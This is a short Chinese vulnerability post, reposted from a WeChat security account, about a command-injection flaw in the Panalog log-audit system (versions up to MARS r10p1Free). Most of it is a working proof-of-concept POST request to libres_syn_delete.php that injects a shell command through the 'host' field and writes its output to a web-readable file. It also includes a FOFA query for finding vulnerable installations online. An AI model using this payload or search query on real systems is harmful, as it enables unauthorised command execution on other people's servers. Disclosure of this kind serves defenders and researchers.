漏洞影响范围
Panalog<= MARS r10p1Free
漏洞复现
poc
POST/content-apply/libres_syn_delete.phpHTTP/1.1Host:User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 28Accept: */*Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedtoken=1&id=2&host=|id >1.txt
漏洞复现
-
出现以下信息代表漏洞存在
2.访问代码执行结果url+/content-apply/1.txt
搜索语法
fofa:body="js/pad-zeropadding.js" && category="日志分析与审计"
原文始发于微信公众号(小白菜安全):Panalog日志审计系统 libres_syn_delete.php命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论